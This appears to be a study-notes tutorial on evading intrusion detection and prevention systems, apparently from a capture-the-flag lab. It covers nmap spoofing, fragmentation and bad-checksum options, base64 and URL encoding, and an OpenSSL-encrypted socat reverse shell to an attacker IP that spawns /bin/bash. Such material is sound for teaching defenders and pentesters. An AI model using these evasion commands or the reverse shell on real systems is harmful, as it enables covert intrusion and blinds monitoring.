IDS/IPS evasion

An IDS (Intrusion Detection System) is a system which can detect an intrusion into the system or the network. An IPS (Intrusion Prevention System) is a system which can block the traffic. An IDS can be an IPS and it’s can be called an IDPS (Intrusion Detection and Prevention System).

The most famous IDS/IPS is Snort. An IDS is connected to a switch and analyse the traffic and sent alert when traffic match with the rules. For blocking the traffic, the IPS need to be in front of the infrastructure, but behind a firewall.

You can two type of IDS:

  • Host-Based IDS (HIDS)
  • Network-Based IDS (NIDS)

The HIDS is a software installed to the system and the NIDS is a network appliance.

An IDS has two types of detection engines:

  • Signature-Based: You need to have a database which store all the signature of the traffic for detecting if the traffic is malicious or not
  • Anomaly-Based: The IDS need to learn (machine learning) the traffic and it can decide if the traffic is malicious or not

Evasion via Protocol Manipulation

When we execute our RCE on the target, we need to try to avoid to be detected by the IDS, we can use the kind of manipulations:

  • Protocol manipulation
  • Source port manipulation
  • IP splitting manipulation
  • Invalid packets

Some IDS or firewall bloc the outbound traffic, except for some protocols, like DNS or HTTPS or to use UDP protocol. So, we can use these protocols with ncat for instance: ncat <target> <port>. For UDP, we can do like that: ncat -u <target> <port>. For listening: ncat -lvnp <port> or ncat -ulvnp <port> for UDP.

When we scan the target, we need to avoid to be detected otherwise we can be block by the administrator or if the IDS do not do deep inspection. For doing that, we can spoof the source port with nmap. For instance, we can scan ports with the DNS as source port: nmap -sU -Pn -g 53 -f <target>.

https://nmap.org/book/man-bypass-firewalls-ids.html

Also, another tips for avoiding to be detected by the IDS, it’s to fragment our IP packets. With nmap, we can specify the option -f for fragmenting the packets or, we can use the linux package fragroute: https://www.monkey.org/~dugsong/fragroute/

We can send invalid packets, in general, the IDS detect only the valid packets. With nmap, we can use the option --badsum for an incorrect checksum. If you want to craft your own packets, you use the tool hping3.

Evasion via Payload Manipulation

If we push into our target our RCE script, we need to protect our payload and to avoid detection by the IDS by the administrator. So, it’s important to encrypt our data. So, three techniques:

  • Obfuscation
  • Encryption
  • Modification

The obfuscation is to encode in base64 your data, but that can be decrypt easily. If you send URL, you can encode it with the tool urlencode available in the package gridsite-clients. That encode some character in hex value: %HH,

The better solution is to encrypt your data with a certificate. Generate a certificate:

openssl req -x509 -newkey rsa:4096 -days 365 -subj '/CN=www.bucchino.org/O=Bucchino/C=FR' -nodes -keyout certificate.key -out certificate.crt
cat certificate.key certificate.crt > certificate.pem

Then, you listen with the certificate:

socat -d -d OPENSSL-LISTEN:4443,cert=thm-reverse.pem,verify=0,fork STDOUT

And you can execute your RCE:

socat OPENSSL:10.20.30.129:4443,verify=0 EXEC:/bin/bash

Evasion via Route Manipulation

With evasion route manipulation include two kind:

  • Source routing
  • Proxy servers

With source routing, you force your packets to use another route to reach their destinations. You can do that with nmap and the option --ip-options.

With proxy servers, you hide the true source behind a proxy. With nmap, you can use the option --proxies and to specify your proxies. Nmap support two kind of proxies: HTTPS and SOCKS4.

Evasion via Tactical DoS

To avoid to be detected by the IDS/IPS, we can make a DoS legitimate traffic to congest the channel and overload the processing capacity of the IDS/IPS.